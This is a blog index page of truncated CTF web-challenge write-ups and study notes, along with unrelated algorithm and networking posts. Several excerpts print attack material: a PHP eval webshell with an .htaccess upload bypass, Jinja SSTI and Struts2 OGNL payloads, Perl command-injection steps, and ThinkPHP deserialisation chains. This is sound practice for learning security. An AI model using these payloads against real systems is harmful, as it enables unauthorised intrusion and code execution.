- 博客(47)
- 收藏
- 关注
原创 [ 攻防世界 ] web进阶
目的:练习做题手感和思路CAT搜索框搜索弹出?url=猜测是SSRF,所有协议均被过滤http://file:///dict://gopher://回归题目和描述,由CAT联想是命令执行,依然是 invalid url思路切入点 invalid url => fuzzfuzz是我思路和实践弱项,积累?url=%88宽字节,获取报错信息html源码复制粘贴本地查看看到了熟悉的django报错页面,看来是将输入的参数传到了后端的django服务中进行解析,而d.
2021-11-23 20:28:25 962
原创 [CTFSHOW] nodejs
web 334下载源码.zip#user.jsmodule.exports = { items: [ {username: 'CTFSHOW', password: '123456'} ]};var express = require('express');var router = express.Router();var users = require('../modules/user').items; var findUser = function(name, pas
2021-11-06 13:01:31 452
原创 [BUUCTF] 备赛第五天
开始计划先刷2020年以后的题目[HFCTF2020]JustEscaperun.php?code=第一反应是命令执行但是一直报错命令没有定义访问run.php<?phpif( array_key_exists( "code", $_GET ) && $_GET[ 'code' ] != NULL ) { $code = $_GET['code']; echo eval(code);} else { highlight_file(__FILE_
2021-11-06 12:08:35 494
原创 [BUUCTF] 备赛刷题第四天
[红明谷CTF 2021]write_shell源码<?phperror_reporting(0);highlight_file(__FILE__);function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }els
2021-11-05 09:45:44 1350
原创 [BUUCTF] 备赛刷题第三天
刷题目录[网鼎杯 2020 玄武组]SSRFMe[网鼎杯 2020 玄武组]SSRFMe想好好做一下ssrf打redis<?phpfunction check_inner_ip($url){ $match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url); if (!$match_result) { die('url fomat error'); }
2021-11-05 09:39:01 295
原创 [BUUCTF] 备赛刷题第二天
刷题目录[WUSTCTF2020]CV Maker[RootersCTF2019]I_<3_Flask拓宽思路 多多尝试常见SSTI的payload收集官方漏洞利用方法WAF绕过新姿势:[CISCN2019 华东南赛区]Double Secret做题思路总结[NPUCTF2020]ezinclude【预期解】【非预期解】做题思路总结[WUSTCTF2020]CV Maker漏洞源码:from flask import Flask, render_template_string, request
2021-11-03 01:19:48 1904 3
原创 [BUUCTF] 备赛刷题第一天
[极客大挑战 2019]RCE MEWallbreaker_Easy绕过disabled function狠简单 一把嗦[SUCTF 2019]EasyWeb<?phpfunction get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); if(!file_ex
2021-11-01 00:49:55 2295
原创 [ctfshow] crypto
常更crypto1签到 倒序输出crypto2jsfuck 控制台 运行crypto3颜文字 控制台 运行会乱码 用burp抓包crypto4RSA题型一给出p q e 求d工具:rsa tool2crypto5RSA题型一给出p q e 密文c 求明文m大数计算工具:big integer calculatecrypto6Rabbit加密知识点:U2FsdGVkX1开头的可能是rabbit,AES,DES,在线解密crypto7ook!编码工具:
2021-10-23 01:35:39 603
原创 [BUUCTF] 近日
这题学jsadmin注册、登录不了随便注册一个账号拿不到flagpermission denied抓包伪造试试修改token我以为这里可以,然而不是,依旧是permission denied看源码表单不是html和php看看app.js/** * 或许该用 koa-static 来处理静态文件 * 路径该怎么配置?不管了先填个根目录XD */function login() { const username = $("#username").val();
2021-10-17 10:56:34 261
原创 [BUUCTF] 网鼎杯 comment
如标题所见,评论区触发1.弱密码爆破2.git源码泄露+恢复git log --refloggit reset --hard 第一个版本ID拿到完整源码<?phpinclude "mysql.php";session_start();if($_SESSION['login'] != 'yes'){ header("Location: ./login.php"); die();}if(isset($_GET['do'])){switch ($_GET['do'
2021-10-15 01:00:21 502
原创 [BUUCTF]SSRF Me
perl get 命令执行漏洞思路:调用命令GET来执行从url获取的参数, 然后按照filename新建文件,写入GET的结果。知识点:bash -c “cmd string” 命令perl脚本GET open命令漏洞GET是Lib for WWW in Perl中的命令目的是模拟http的GET请求,GET函数底层就是调用了open处理open存在命令执行,并且还支持file函数先创123文件查看根目录创建poc1?url=/&filename=123p
2021-10-10 17:15:25 379
原创 [BUUCTF] real-struts2
s2-001原理该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行漏洞原理分析获取tomcat执行路径:%{"tomcatBinDir{"+@java.lang.System@getProperty("u
2021-10-09 02:30:51 411
原创 [BUUCTF] 集训第八天
[RCTF2015]EasySQL测试找一下报错点击用户名查看到信息,可以改密码修改密码发现报错信息在user处,猜测sql语句 select * from user where username=" " and pwd=' 'or被过滤,可以使用||。空格被过滤了,可以用()fuzz一下,updatexml和extravalue均可利用这里使用报错注入构造payload报错注入知识点: 十种Mysql报错注入updatexml爆库j1a"||updatexml(
2021-10-07 14:19:18 291
原创 [BUUCTF] 集训第七天
[CISCN2019 华北赛区 Day1 Web1]Dropbox任意文件下载phar反序列化知识点在下载的时候可以通过抓包修改文件名filename=…/…/index.php//class.php<?phperror_reporting(0);$dbaddr = "127.0.0.1";$dbuser = "root";$dbpass = "root";$dbname = "dropbox";$db = new mysqli($dbaddr, $dbuser, $db
2021-10-04 16:04:00 613
原创 [BUUCTF] 集训第六天
[BSidesCF 2019]Futurella火星文复制粘贴搜索框就可以获得flag看源码轻易得不敢copy flag[GYCTF2020]FlaskApp这里会自动重定向到xss平台,很迷flask debug可以找到源码flasky尝试ssti模板注入先重定向 点击返回拿到base64编码去解码 同理点击+返回操作{{7*7}}不可以 {{7+7}}可以 别问为什么 有waf读app.py{% for c in [].__class__.__base__.__
2021-10-03 12:46:55 1489
原创 [BUUCTF] 集训第五天
[MRCTF2020]PYWebsite查看源码 function enc(code){ hash = hex_md5(code); return hash; } function validate(){ var code = document.getElementById("vcode").value; if (code != ""){ if(hex_md5(code) == "0cd4da0223c0b280829
2021-10-02 12:58:46 561
原创 [BUUCTF] 集训第四天
[De1CTF 2019]SSRF Me打开就是乱七八糟的py源码,没有工具,自己缩进,所以要提升代码审计能力,不仅是php还有py源码#! /usr/bin/env python# #encoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.se
2021-10-01 16:53:02 448
原创 [BUUCTF] 集训第二天
补题[GXYCTF2019]BabyUpload1正常开端一句话木马<?php eval($_POST[cmd]);?>php文件不许上传,尝试上传jpg换个姿势改一下内容<script language='php'>eval($_POST[cmd]);</script>上传成功,记得这个路径因为是jpg文件,无法解析php,观察是Apache server,上传.htaccess文件来将其他文件解析成PHP文件.htaccess文件是Apa
2021-09-29 12:44:33 439
原创 [BUUCTF] 集训第一天
[网鼎杯 2020 朱雀组]phpweb1[安洵杯 2019]easy_web1打开注意到img值选正确且最强的解码工具解码两次base64解码+hex转strhackbar解码有获取文件内容功能,尝试编码获取index. php最强base64工具获取图片base解密信息,拿到index.php关键源码<?phperror_reporting(E_ALL || ~ E_NOTICE);header('content-type:text/html;char
2021-09-29 11:24:22 380
原创 [ POP链 ] thinkphp5.1.x~5.2.x
thinkphp 5.1.x~5.2.x反序列化思路学习起点:/thinkphp/library/think/process/pipes/Windows.php的__destruct()__destruct()里面调用了两个函数,一个关闭连接close()方法,忽略,然后我们跟进removeFiles()函数。这里使用了$this->files,而且这里的$files是可控的。所以存在一个任意文件删除的漏洞。POC可以这样构造:namespace think\process\pipes;
2021-09-27 21:25:58 413
原创 [ POP链 ] thinkphp_5.0.x
thinkphp_5.0.24 rce漏洞思路学习起点:thinkphp/library/think/process/pipes/Windows.phpremoveFiles方法跳板:file_exists方法能够触发__toString魔术方法$filename跳板利用点:thinkphp/library/think/Model.phpModel抽象类的 __toString跟进toJson方法至toArray方法如下图Model抽象类的toArray方法,存在三个地方可以
2021-09-27 15:59:50 225
原创 【TCP/IP详解(I)】四层协议概述
网络分层网络协议通常分不同层次进行开发,每一层分别负责不同的通信功能。一个协议族,比如TCP/IP,是一组不同层次上的多个协议的组合。TCP/IP通常被认为是一个四层协议系统每一层负责不同的功能,从底层向上分别是:(1) 链路层有时也称作数据链路层或网络接口层,通常包括操作系统中的设备驱动程序和计算机中对应的网络接口卡。它们一起处理与电缆(或其他任何传输媒介)的物理接口细节。(2) 网络层有时也称作互联网层,处理分组在网络中的活动,例如分组的选路。在TCP/IP协议族中,网络层协议包括
2021-08-09 22:55:49 12680
原创 【拓展】Win10怎么设置IP
一、打开控制面板,找到网络和Internet二、找到网络和共享中心三、点击正在使用的网络四、点击属性五、点击Internet协议版本 4 (TCP/IPv4)即可修改IP 或 DNS
2021-02-20 20:20:34 304
原创 【数据结构】排序算法_秒懂算法+洛谷刷题
0x01_快速排序时间复杂度:平均O(n*log2n) 最坏的情况O(n^2)模板 Quicksort():void Quicksort(int array[], int l, int r){ if(l>=r) return ; int left = l, right = r; int pivot = array[left]; while (left < right) { while (left < right &&a
2021-02-07 22:52:33 179
原创 【PHP】常见的超级全局变量
$GLOBALS 储存全局作用域中的变量 // 运用例题:Bugku-web9$_SERVER 获取服务器相关信息 $_ENV 获取服务器端环境变量的数组$_COOKIE 浏览器cookie的操作$_SESSION 服务端session的操作$_REQUEST 获取POST和GET请求的参数 $_POST
2021-01-24 21:54:57 231
原创 【虚拟机】安装kali时所遇问题
安装kali时提示“你的网络可能并未使用DHCP协议”windows+services.msc进入服务界面这五个都要开启!安装Linux时的HTTP代理信息怎么填?不需要设置代理的(直接点击“继续”按钮),代理只是在个别情况才需要,即使需要HTTP代理安装好了以后也可以再另外设置,虚拟机安装的Kali Linux在虚拟机网卡设置里面,设置成桥接就可以联网了。...
2021-01-24 08:41:07 1046 2
原创 【WiFi】如何查看本机所连接、连接过的WiFi密码
如何解决遗忘管理员密码或WiFi密码的问题?0x01忘记管理员账户密码:http://www.luyoudashi.com/set/reset.htmlhttps://zhidao.baidu.com/question/433607546378757724.html当然最简单的方法就是重置啦 然后登录wifi默认地址输入默认账号和密码即可0x02忘记WiFi密码方法一:...
2020-12-18 19:36:54 778 2
原创 【C/C++】补习之道_链表
0x01定义链表是物理存储单元上非连续的、非顺序的存储结构,数据元素的逻辑顺序是通过链表的指针地址实现,有一系列结点(地址)组成,结点可动态的生成。0x02构成以及概念数据域指针域链表中存放的不是基本数据类型,需要用结构体实现自定义:struct link{ int data; //数据域 struct link *next; //指针域}0x03分类单链表双向链表环形链表...
2020-12-09 15:35:25 169
原创 【C/C++】补习之道_结构体
0x01结构体的概念结构体属于用户自定义的数据类型,允许储存不同的数据类型0x02结构体的定义与使用格式:struct 结构体名{结构体变量1; 结构体变量2;}结构体创建方式:struct student s1;struct student s2 = { … };在创建结构体的时候创建结构体变量struct student { … }s3;Example:#include<bits/stdc++.h>using namespace std;struc
2020-11-25 14:33:53 242
转载 【Java】配置环境找不到jdk安装路径怎么办?
看这篇就够了https://jingyan.baidu.com/article/6b97984df8c2521ca2b0bf13.html
2020-11-03 03:16:17 16337
原创 【ACM】算法学习路线
数据结构顺序表顺序表的表示顺序表的增删改查常见排序算法(冒泡,选择,插入,希尔,通,归并,快排,堆排序,桶排序,基数排序)队列栈链表单链表单链表的增删改查双链表链式栈,链式队列环形队列块状表树二叉树二叉树的链式存储二叉树的顺序存储二叉树的建立哈夫曼树二叉树的遍历(先序,中序,后序,层次)二叉排序树(二叉搜索树)二叉排序树的建立完全二叉树堆大顶堆,小顶堆堆排序平衡二叉树二叉树的旋转多叉树B+树图有向.
2020-09-30 00:04:30 1211
原创 【ACM】近期学习到的新知识整理
好吧,其实都是从谢俊师兄那里偷师学艺到的(胜利( •̀ ω •́ )y一.C++的STL参考博客:C++STL快速入门二.算法新知识首先,最适合我这种萌新上手的就是 素数表素数打表高效算法 ( 复杂度 O(n)其次,就是神奇的 矩阵快速幂最后分量级选手来了: 线段树洛谷参考例题...
2020-09-29 23:35:51 146
原创 【洛谷】1553_数字反转
第一次的思路是遍历一遍字符串数组,用count判断是否全为数字;如果遇到分数或小数点,则用x标记,以便划分两部分反转;如果为百分数,则只用反转百分号前的数字代码如下:#include<bits/stdc++.h>using namespace std;string s;int main(){ int count=0,x=0; cin>>s; for(int i=0;i<s.size();i++){ if(s[i]>='0'&&s
2020-09-24 20:18:07 252
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人